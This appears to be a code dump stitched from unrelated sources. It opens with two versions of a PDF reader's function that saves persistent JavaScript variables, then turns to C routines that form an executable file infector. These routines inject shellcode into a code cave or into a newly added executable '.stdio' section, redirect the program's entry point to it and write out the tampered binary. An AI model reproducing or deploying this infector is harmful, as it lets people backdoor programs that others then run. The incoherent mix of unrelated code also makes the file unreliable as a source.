void CJS_GlobalData::SaveGlobalPersisitentVariables() { uint32_t nCount = 0; CFX_BinaryBuf sData; for (const auto& pElement : m_arrayGlobalData) { if (pElement->bPersistent) { CFX_BinaryBuf sElement; MakeByteString(pElement->data.sKey, &pElement->data, sElement); if (sData.GetSize() + sElement.GetSize() > JS_MAXGLOBALDATA) break; sData.AppendBlock(sElement.GetBuffer(), sElement.GetSize()); nCount++; } } CFX_BinaryBuf sFile; uint16_t wType = (uint16_t)(('X' << 8) | 'F'); sFile.AppendBlock(&wType, sizeof(uint16_t)); uint16_t wVersion = 2; sFile.AppendBlock(&wVersion, sizeof(uint16_t)); sFile.AppendBlock(&nCount, sizeof(uint32_t)); uint32_t dwSize = sData.GetSize(); sFile.AppendBlock(&dwSize, sizeof(uint32_t)); sFile.AppendBlock(sData.GetBuffer(), sData.GetSize()); CRYPT_ArcFourCryptBlock(sFile.GetBuffer(), sFile.GetSize(), JS_RC4KEY, sizeof(JS_RC4KEY)); WriteFileBuffer(m_sFilePath.c_str(), (const FX_CHAR*)sFile.GetBuffer(), sFile.GetSize()); }
void CJS_GlobalData::SaveGlobalPersisitentVariables() { FX_DWORD nCount = 0; CFX_BinaryBuf sData; for (int i = 0, sz = m_arrayGlobalData.GetSize(); i < sz; i++) { CJS_GlobalData_Element* pElement = m_arrayGlobalData.GetAt(i); if (pElement->bPersistent) { CFX_BinaryBuf sElement; MakeByteString(pElement->data.sKey, &pElement->data, sElement); if (sData.GetSize() + sElement.GetSize() > JS_MAXGLOBALDATA) break; sData.AppendBlock(sElement.GetBuffer(), sElement.GetSize()); nCount++; } } CFX_BinaryBuf sFile; FX_WORD wType = (FX_WORD)(('X' << 8) | 'F'); sFile.AppendBlock(&wType, sizeof(FX_WORD)); FX_WORD wVersion = 2; sFile.AppendBlock(&wVersion, sizeof(FX_WORD)); sFile.AppendBlock(&nCount, sizeof(FX_DWORD)); FX_DWORD dwSize = sData.GetSize(); sFile.AppendBlock(&dwSize, sizeof(FX_DWORD)); sFile.AppendBlock(sData.GetBuffer(), sData.GetSize()); CRYPT_ArcFourCryptBlock(sFile.GetBuffer(), sFile.GetSize(), JS_RC4KEY, sizeof(JS_RC4KEY)); WriteFileBuffer(m_sFilePath.c_str(), (const FX_CHAR*)sFile.GetBuffer(), sFile.GetSize()); }
int main(int argc, char* argv[]) { void* lpBuffer = 0; unsigned long ulBuffer = CreateFileBuffer(argv[1], &lpBuffer); if (lpBuffer) { if (ulBuffer) { unsigned long ulCodeCave = 0; CodeCave sCodeCave = {0}; if (ulCodeCave = ScanCodeCave(&sCodeCave, lpBuffer,ulBuffer,sizeof(ucShellCode)+10)) { unsigned long ulOffset = 0; m_memcpy((void*)(sCodeCave.ulAddress), ucCallCode, sizeof(ucCallCode)); ulOffset = sCodeCave.ulEntryPoint - (sCodeCave.ulVirtualAddress + sCodeCave.ulVirtualAddressOffset + sizeof(ucCallCode)) - 5; m_memcpy(&ucJMP[1],&ulOffset, sizeof(unsigned long)); m_memcpy((void*)(sCodeCave.ulAddress + sizeof(ucCallCode)), ucJMP,sizeof(ucJMP)); m_memcpy((void*)(sCodeCave.ulAddress + sizeof(ucCallCode) + sizeof(ucJMP)), ucShellCode, sizeof(ucShellCode)); if (WriteFileBuffer("NTTITON.exe", lpBuffer,ulBuffer) == ulBuffer) { printf("Done\n"); } } else { AddSection(lpBuffer,ulBuffer, sizeof(ucShellCode) + 10); } } VirtualFree(lpBuffer,ulBuffer,MEM_RELEASE); } return 0; }
void AddSection(void* lpModule, unsigned long ulModule, unsigned long ulRawSize) { PIMAGE_DOS_HEADER lpDos = (PIMAGE_DOS_HEADER)(lpModule); PIMAGE_NT_HEADERS lpNt = (PIMAGE_NT_HEADERS)((unsigned long)lpDos + lpDos->e_lfanew); if (lpNt->Signature == IMAGE_NT_SIGNATURE) { unsigned long ulNewImageSize = ulModule + CalculateBoundary(lpNt->OptionalHeader.FileAlignment, ulRawSize); if (ulNewImageSize) { void * lpNewBase = VirtualAlloc(NULL,ulNewImageSize,MEM_COMMIT|MEM_RESERVE,0x40); if (lpNewBase) { PIMAGE_SECTION_HEADER lpLastSection = (PIMAGE_SECTION_HEADER)((unsigned long)lpNewBase + lpDos->e_lfanew + sizeof(IMAGE_NT_HEADERS) + ((lpNt->FileHeader.NumberOfSections-1)*40)); PIMAGE_SECTION_HEADER lpNewSection = (PIMAGE_SECTION_HEADER)((unsigned long)lpLastSection + sizeof(IMAGE_SECTION_HEADER)); unsigned long ulEOF = 0; unsigned long ulCheckSum = 0; unsigned long ulOldCheckSum = 0; unsigned long ulEntryPoint = 0; unsigned long ulOffset = 0; lpNt = (PIMAGE_NT_HEADERS)((unsigned long)lpNewBase+ lpDos->e_lfanew); RtlSecureZeroMemory(lpNewBase,ulNewImageSize); m_memcpy(lpNewBase,lpModule,ulModule); m_memcpy(&lpNewSection->Name, ".stdio", strlen(".stdio")); lpNewSection->SizeOfRawData = CalculateBoundary(lpNt->OptionalHeader.FileAlignment,ulRawSize); lpNewSection->PointerToRawData = CalculateBoundary(lpNt->OptionalHeader.FileAlignment, lpLastSection->PointerToRawData + lpLastSection->SizeOfRawData); lpNewSection->VirtualAddress = CalculateBoundary(lpNt->OptionalHeader.SectionAlignment, lpLastSection->VirtualAddress + lpLastSection->Misc.VirtualSize); lpNewSection->Characteristics = (IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ); lpNewSection->Misc.VirtualSize = ulRawSize; lpNt->FileHeader.NumberOfSections++; lpNt->OptionalHeader.SizeOfImage = CalculateBoundary(lpNt->OptionalHeader.SectionAlignment, lpNewSection->VirtualAddress + ulRawSize); ulEntryPoint = lpNt->OptionalHeader.AddressOfEntryPoint; m_memcpy((void*)((unsigned long)lpNewBase + lpNewSection->PointerToRawData), ucCallCode, sizeof(ucCallCode)); ulOffset = ulEntryPoint - (lpNewSection->VirtualAddress + sizeof(ucCallCode)) - 5; m_memcpy(&ucJMP[1],&ulOffset, sizeof(unsigned long)); m_memcpy((void*)((unsigned long)lpNewBase + lpNewSection->PointerToRawData + sizeof(ucCallCode)), ucJMP,sizeof(ucJMP)); m_memcpy((void*)((unsigned long)lpNewBase + lpNewSection->PointerToRawData + sizeof(ucCallCode) + sizeof(ucJMP)), ucShellCode, sizeof(ucShellCode)); if (ulEOF = GetEOFSize(lpLastSection, ulModule)) { m_memcpy((void*)((unsigned long)lpNewBase + lpNewSection->PointerToRawData + lpNewSection->SizeOfRawData), (void*)((unsigned long)lpModule + (lpLastSection->PointerToRawData + lpLastSection->SizeOfRawData)), ulEOF); } lpNt->OptionalHeader.AddressOfEntryPoint = (lpNewSection->VirtualAddress); if (CheckSumMappedFile(lpNewBase,ulNewImageSize, &ulOldCheckSum, &ulCheckSum)) { lpNt->OptionalHeader.CheckSum = ulCheckSum; } if (WriteFileBuffer("NTTITON.exe",lpNewBase,ulNewImageSize)) { printf("Had to add section.... no codecaves were available FUUUUCK\n"); } VirtualFree(lpNewBase,ulNewImageSize,MEM_RELEASE); } } } }